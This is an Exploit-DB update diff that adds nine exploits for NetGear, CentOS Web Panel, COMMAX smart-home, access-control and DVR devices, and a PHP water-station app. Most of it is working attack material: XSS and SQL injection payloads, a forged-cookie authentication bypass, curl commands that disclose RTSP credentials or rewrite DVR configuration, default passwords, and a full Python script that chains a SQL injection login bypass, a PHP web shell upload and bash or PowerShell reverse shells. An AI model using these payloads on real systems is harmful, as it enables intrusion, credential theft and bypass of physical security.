DB: 2021-08-17

9 changes to exploits/shellcodes

NetGear D1500 V1.0.0.21_1.0.1PE - 'Wireless Repeater' Stored Cross-Site Scripting (XSS)
CentOS Web Panel 0.9.8.1081 - Stored Cross-Site Scripting (XSS)
Simple Water Refilling Station Management System 1.0 - Authentication Bypass
Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload
COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
COMMAX Smart Home IoT Control System CDP-1020n - SQL Injection Authentication Bypass
COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure
COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)
COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure

exploits/hardware/webapps/50201.txt

@@ -0,0 +1,38 @@
+# Exploit Title: NetGear D1500 V1.0.0.21_1.0.1PE - 'Wireless Repeater' Stored Cross-Site Scripting (XSS)
+# Date: 21 Dec 2018
+# Exploit Author: Securityium 
+# Vendor Homepage: https://www.netgear.com/
+# Version: V1.0.0.21_1.0.1PE
+# Tested on: NetGear D1500 Home Router
+# Contact: assessors@securityium.com
+
+
+Version :
+Hardware version: D1500-100PES-A
+Firmware Version : V1.0.0.21_1.0.1PE
+
+Step to Reproduce Video: https://www.youtube.com/watch?v=JcRYxH93E5E
+
+Tested Network: Local LAN
+
+SSID Details:
+Attacker SSID : <script>confirm(222)</sciprt>
+
+Attack Description :
+If any admin is logged on the router admin panel. if he/she try to connect any other SSID for Wireless Repeating Function. that time they need to check available SSID surrounding. that name is not sanitized properly before showing on the web's admin panel which leads to Stored XSS. This issue was discovered by Touhid M.Shaikh (@touhidshaikh22)
+
+Attack Impact:
+The attacker can steal the cookies of the admin.
+
+Step to Reproduce:
+For Attacker:
+1) First, you need to create a hotspot with a vulnerable SSID name. (which you want to get executed on the remote router's admin panel.)
+2) In my case, I have created a hotspot from my mobile phone and gives an SSID name to <script>confirm(22)</script>
+
+For routers admin
+3) Logged in as admin.
+2) Go to Advanced --> Advanced Setup --> Wireless Repeating Function
+3) Enable Wireless Repeating Function
+4) click on check.
+
+wait for the checking scan to finish and display the surrounding networks list.

exploits/hardware/webapps/50206.txt

@@ -0,0 +1,66 @@
+# Exploit Title: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX Biometric Access Control System 1.0.0 Authentication Bypass
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: 1.0.0
+
+Summary: Biometric access control system.
+
+Desc: The application suffers from an authentication bypass vulnerability.
+An unauthenticated attacker through cookie poisoning can bypass authentication
+and disclose sensitive information and circumvent physical controls in smart
+homes and buildings.
+
+Tested on: nginx/1.14.0 (Ubuntu)
+           MariaDB/10.3.15
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5661
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
+
+
+02.08.2021
+
+--
+
+
+The following request with Cookie forging bypasses authentication and lists available SQL backups.
+
+GET /db_dump.php HTTP/1.1
+Host: 192.168.1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.1.1/user_add.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
+Connection: close
+
+
+HTTP/1.1 200 OK
+Server: nginx/1.14.0 (Ubuntu)
+Date: Tue, 03 Aug 1984 14:07:39 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+Content-Length: 10316
+
+
+<!DOCTYPE html>
+<html class="no-js" lang="ko">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<title>::: COMMAX :::</title>
+...
+...

exploits/hardware/webapps/50207.txt

@@ -0,0 +1,65 @@
+# Exploit Title: COMMAX Smart Home IoT Control System CDP-1020n - SQL Injection Authentication Bypass
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: CDP-1020n
+                  481 System
+
+Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
+complex that provides advanced life values and safety.
+
+Desc: The application suffers from an SQL Injection vulnerability. Input passed
+through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised
+before being returned to the user or used in SQL queries. This can be exploited
+to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
+mechanism.
+
+Tested on: Microsoft-IIS/7.5
+           ASP.NET
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5662
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5662.php
+
+
+02.08.2021
+
+--
+
+
+POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 37
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/mainstart.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
+Cookie: {}
+
+id=%27+or+1%3D1--&x=0&y=0&pass=waddup
+
+
+HTTP/1.1 200 OK
+Cache-Control: private
+Content-Length: 621
+Content-Type: text/html
+Server: Microsoft-IIS/7.5
+Set-Cookie: {}
+X-Powered-By: ASP.NET
+Date: Tue, 03 Aug 1984 22:57:56 GMT

exploits/hardware/webapps/50208.txt

@@ -0,0 +1,65 @@
+# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: n/a
+
+Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
+complex that provides advanced life values and safety.
+
+Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
+to disclose RTSP credentials in plain-text.
+
+Tested on: GoAhead-Webs
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5665
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
+
+
+02.08.2021
+
+--
+
+
+$ curl http://TARGET:8086/overview.asp
+<HTML>
+<HEAD>
+<TITLE> Infomation</TITLE>
+<script src="./jquery.min.js"></script>
+<script src="./jquery.cookie.js"></script>
+<script src="./login_check.js"></script>
+</HEAD>
+<BODY>
+<br><br>
+<center>
+<table>
+<tr><td>
+<li> [2021/08/15 09:56:46]  Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <BR>
+</td></tr>
+</table>
+</center>
+</BODY>
+</HTML>
+
+
+$ curl http://TARGET:8086/login_check.js:
+var server_ip = $(location).attr('host');
+var server_domain = server_ip.replace(":8086", "");
+
+document.domain = server_domain;
+
+var cookiesAuth = $.cookie("cookiesAuth");
+
+if (cookiesAuth != "authok") {
+    parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
+}

exploits/hardware/webapps/50209.txt

@@ -0,0 +1,70 @@
+# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: n/a
+
+Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
+complex that provides advanced life values and safety.
+
+Desc: The application allows an unauthenticated attacker to change the configuration
+of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.
+
+Tested on: GoAhead-Webs
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5666
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php
+
+
+02.08.2021
+
+--
+
+
+#1
+
+$ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"
+
+*   Trying 192.168.1.1...
+* TCP_NODELAY set
+* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
+> POST /goform/setconf HTTP/1.1
+> Host: 192.168.1.1:8086
+> User-Agent: curl/7.55.1
+> Accept: */*
+> Content-Length: 257
+> Content-Type: application/x-www-form-urlencoded
+>
+* upload completely sent off: 257 out of 257 bytes
+* HTTP 1.0, assume close after body
+< HTTP/1.0 200 OK
+< Server: GoAhead-Webs
+< Pragma: no-cache
+< Cache-control: no-cache
+< Content-Type: text/html
+<
+<html>
+<br><br><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html>
+* Closing connection 0
+
+#2
+
+$ curl -v http://192.168.1.1:8086
+* Rebuilt URL to: http://192.168.1.1:8086/
+*   Trying 192.168.1.1...
+* TCP_NODELAY set
+* connect to 192.168.1.1 port 8086 failed: Connection refused
+* Failed to connect to 192.168.1.1 port 8086: Connection refused
+* Closing connection 0
+curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused

exploits/hardware/webapps/50210.txt

@@ -0,0 +1,60 @@
+# Exploit Title: COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: CVD-AH04 DVR 4.4.1
+                  CVD-AF04 DVR 4.4.1
+                  CVD-AH16 DVR 5.1.4
+                  CVD-AF16 DVR 4.4.1
+                  CVD-AF08 DVR 5.1.2
+                  CVD-AH08 DVR 5.1.2
+
+Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer
+needs and convenience in single or multi-family homes.
+
+Desc: The web control panel uses weak set of default administrative credentials that
+can be easily guessed in remote password attacks and disclose RTSP stream.
+
+Tested on: Boa/0.94.14rc19
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5667
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php
+
+
+02.08.2021
+
+--
+
+
+Login:
+$ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234"
+HTTP/1.1 200 OK
+Date: Mon, 16 Aug 2021 01:04:52 GMT
+Server: Boa/0.94.14rc19
+Accept-Ranges: bytes
+Connection: close
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"  "http://www.w3.org/TR/html4/frameset.dtd">
+
+IE (ActiveX) web player:
+http://192.168.1.2/web_viewer2.html
+
+Snapshots:
+http://192.168.1.2/images/snapshot-01.jpg
+http://192.168.1.2/images/snapshot-02.jpg
+http://192.168.1.2/images/snapshot-nn.jpg
+
+
+Creds:
+Users: ADMIN,USER1,USER2,USER3
+Password: 1234

exploits/linux/webapps/50200.txt

@@ -0,0 +1,21 @@
+# Exploit Title: CentOS Web Panel 0.9.8.1081 - Stored Cross-Site Scripting (XSS)
+# Date: 13/08/2021
+# Exploit Author: Dinesh Mohanty
+# Vendor Homepage: http://centos-webpanel.com
+# Software Link: http://centos-webpanel.com
+# Version: v0.9.8.1081
+# Tested on: CentOS 7 and 8
+
+# Description:
+Multiple Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the Short Name, Ip Origin, Key Code, Format Request and Owner fields within the admin api page of module of CentOS/ Control WebPanel when user tries to create a new API. This is because the application does not properly sanitize users input.
+
+
+# Steps to Reproduce:
+1. Login into the CentOS Web Panel using admin credential.
+2. From Navigation Click on "API Manager" -> then Click on "Allow New API Access"
+3. In the above given fields give payload as: <img src=x onerror=alert(1)> and provide other details and click on "Create"
+4. Now one can see that the XSS Payload executed.
+
+#Vendor Notification
+18th Aug 2021 - Vendor has been notified
+18th Aug 2021 - Vendor confirmed the issue and fixed for next version

exploits/php/webapps/50204.txt

@@ -0,0 +1,47 @@
+# Exploit Title: Simple Water Refilling Station Management System 1.0 - Authentication Bypass
+# Exploit Author: Matt Sorrell
+# Date: 2021-08-14
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html
+# Version: 1.0
+# Tested On: Windows Server 2019 and XAMPP 7.4.22
+
+# The Simple Water Refilling Station Management System 
+# is vulnerable to a SQL Injection because it fails to sufficiently sanitize 
+# user-supplied data before using it in a SQL query.  Successful exploitation
+# of this issue could allow an attacker to bypass the application's
+# authentication controls and possibly access other sensitive data.
+
+# Vulnerable Code: Line 21 in water_refilling/classes/Login.php
+
+qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
+
+# Vulnerable Request
+
+POST /water_refilling/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 35
+sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
+Accept: */*
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/water_refilling/admin/login.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=64v67e3dctju48lon9d8gepct7
+
+
+username=a&password=a
+
+
+# Vulnerable Payload
+# Parameter: username (POST)
+
+username=a'+OR+1%3D1--+-&password=a

exploits/php/webapps/50205.py

@@ -0,0 +1,126 @@
+# Exploit Title: Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload
+# Exploit Author: Matt Sorrell
+# Date: 2021-08-14
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html
+# Version: 1.0
+# Tested On: Windows Server 2019 and XAMPP 7.4.22
+
+# The Simple Water Refilling Station Management System 
+# contains a file upload vulnerability that allows for remote 
+# code execution against the target.  This exploit requires 
+# the user to be authenticated, but a SQL injection in the login form 
+# allows the authentication controls to be bypassed.  The application does not perform
+# any validation checks against the uploaded file at "/classes/SystemSettings.php"
+# and the directory it is placed in allows for execution of PHP code.
+
+
+#!/usr/bin/env python3
+
+import requests
+from bs4 import BeautifulSoup as bs
+import time
+import subprocess
+import base64
+import sys
+
+
+def login_with_injection(url, session):
+	target = url + "/classes/Login.php?f=login"
+
+	data = {
+		"username": "test' OR 1=1-- -",
+		"password": "test"
+	}
+
+	r = session.post(target, data=data)
+	if '"status":"success"' in r.text:
+		return True
+	else:
+		return False
+
+def upload_shell(url, session):
+	target = url + "/classes/SystemSettings.php?f=update_settings"
+
+	files = {'img': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'application/x-php')}
+
+	r = session.post(target, files=files)
+	
+	if r.headers['Content-Length'] != 1:
+		print("[+] Shell uploaded.\n")
+		return r.links
+	else:
+		print("Error uploading file.  Exiting.")
+		exit(-1)
+
+def activate_shell(url, session, OS, rev_ip, rev_port):
+	target = url + "/admin/?page=system_info"
+
+	r = session.get(target)
+	page_data = r.text
+	soup = bs(page_data, features='lxml')
+
+	for link in soup.find_all('link'):
+		if "shell" in link.get('href'):
+			shell_url = link.get('href')
+			break
+
+
+	print(f"[+] Found URL for shell: {shell_url}\n")
+
+	print("[*] Attempting to start reverse shell...")
+
+	subprocess.Popen(["nc","-nvlp",f"{rev_port}"])
+	time.sleep(1)
+
+	if OS.lower() == "linux":
+		cmd = f"bash -c 'bash -i >& /dev/tcp/{rev_ip}/{rev_port}'"
+	else:
+		cmd = f"$TCPClient = New-Object Net.Sockets.TCPClient('{rev_ip}', {rev_port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {{[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {{0}};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {{$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {{Invoke-Expression $Command 2>&1 | Out-String}} catch {{$_ | Out-String}}WriteToStream ($Output)}}$StreamWriter.Close()".strip()
+
+		cmd = "C:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -enc " + base64.b64encode(cmd.encode('UTF-16LE')).decode()
+
+	r = session.get(shell_url+"?cmd="+cmd)
+
+def main():
+	
+	if len(sys.argv) != 5:
+		print(f"(+) Usage:\t python3 {sys.argv[0]} <TARGET IP> <LISTENING IP> <LISTENING PORT> <WINDOWS/LINUX Target>")
+		print(f"(+) Usage:\t python3 {sys.argv[0]} 10.1.1.1 10.1.1.20 443 windows")
+		exit(-1)
+	else:
+		ip = sys.argv[1]
+		rev_ip = sys.argv[2]
+		rev_port = sys.argv[3]
+		OS = sys.argv[4]
+
+	URL = f"http://{ip}/water_refilling"
+
+
+	s = requests.Session()
+
+	print("[*] Trying to bypass authentication through SQL injection...\n")
+
+	if not login_with_injection(URL, s):
+		print("[-] Failed to login.  Exiting.")
+		exit(-1)
+	else:
+		print("[+] Successfully logged in.\n")
+
+	time.sleep(2)
+	print("[*] Trying to upload shell through system logo functionality...\n")
+	
+	links = upload_shell(URL, s)
+
+	# Sleeping for 2 seconds to avoid problems finding the file uploaded
+	time.sleep(2)
+
+	print("[*] Getting shell URL and sending reverse shell command...\n")
+	activate_shell(URL, s, OS, rev_ip, rev_port)
+
+	while True:
+		pass
+
+
+if __name__ == "__main__":
+	main()

files_exploits.csv

@@ -44204,6 +44204,8 @@ id,file,description,date,author,type,platform,port
 50044,exploits/php/webapps/50044.txt,"Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)",2021-06-21,"Riadh Benlamine",webapps,php,
 50042,exploits/php/webapps/50042.py,"Websvn 2.6.0 - Remote Code Execution (Unauthenticated)",2021-06-21,g0ldm45k,webapps,php,
 50046,exploits/php/webapps/50046.txt,"Customer Relationship Management System (CRM) 1.0 - Remote Code Execution",2021-06-21,"Ishan Saha",webapps,php,
+50201,exploits/hardware/webapps/50201.txt,"NetGear D1500 V1.0.0.21_1.0.1PE - 'Wireless Repeater' Stored Cross-Site Scripting (XSS)",2021-08-16,Securityium,webapps,hardware,
+50200,exploits/linux/webapps/50200.txt,"CentOS Web Panel 0.9.8.1081 - Stored Cross-Site Scripting (XSS)",2021-08-16,"Dinesh Mohanty",webapps,linux,
 50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,
 50050,exploits/php/webapps/50050.txt,"Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)",2021-06-22,"Pratik Khalane",webapps,php,
 50051,exploits/php/webapps/50051.txt,"WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)",2021-06-23,"Mohammed Adam",webapps,php,
@@ -44328,3 +44330,10 @@ id,file,description,date,author,type,platform,port
 50197,exploits/php/webapps/50197.txt,"Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS",2021-08-13,securityforeveryone.com,webapps,php,
 50198,exploits/php/webapps/50198.txt,"Simple Image Gallery System 1.0 - 'id' SQL Injection",2021-08-13,"Azumah Foresight Xorlali",webapps,php,
 50199,exploits/php/webapps/50199.txt,"RATES SYSTEM 1.0 - Authentication Bypass",2021-08-13,"Azumah Foresight Xorlali",webapps,php,
+50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,
+50205,exploits/php/webapps/50205.py,"Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload",2021-08-16,"Matt Sorrell",webapps,php,
+50206,exploits/hardware/webapps/50206.txt,"COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass",2021-08-16,LiquidWorm,webapps,hardware,
+50207,exploits/hardware/webapps/50207.txt,"COMMAX Smart Home IoT Control System CDP-1020n - SQL Injection Authentication Bypass",2021-08-16,LiquidWorm,webapps,hardware,
+50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",2021-08-16,LiquidWorm,webapps,hardware,
+50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",2021-08-16,LiquidWorm,webapps,hardware,
+50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",2021-08-16,LiquidWorm,webapps,hardware,